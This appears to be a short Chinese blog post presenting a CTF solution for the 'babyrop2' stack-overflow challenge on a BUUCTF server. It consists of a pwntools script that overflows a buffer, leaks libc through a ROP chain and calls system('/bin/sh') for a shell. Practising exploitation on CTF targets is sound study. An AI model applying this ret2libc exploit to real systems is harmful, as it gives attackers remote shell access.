本文最后更新于 549 天前,其中的信息可能已经有所发展或是发生改变。
简单的栈溢出
from LibcSearcher import *
from pwn import *
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = 'debug'
content = 0
elf = ELF('./babyrop2')
format_str = 0x0400770
print_plt = elf.plt['printf']
read_got = elf.got['read']
main_addr = elf.sym['main']
pop_rdi = 0x400733
pop_rsi_r15 = 0x400731
def main():
if content == 1:
p = process('./babyrop2')
else:
p = remote("node4.buuoj.cn", 26275)
payload = b'a' * (0x20 + 8) + p64(pop_rdi) + p64(format_str) + p64(pop_rsi_r15) + p64(
read_got) + p64(0) + p64(print_plt) + p64(main_addr)
p.recvuntil("What's your name? ")
p.sendline(payload)
read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload = b'a' * (0x20 + 8) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.recvuntil("What's your name? ")
p.sendline(payload)
p.interactive()
main()
浏览量: 117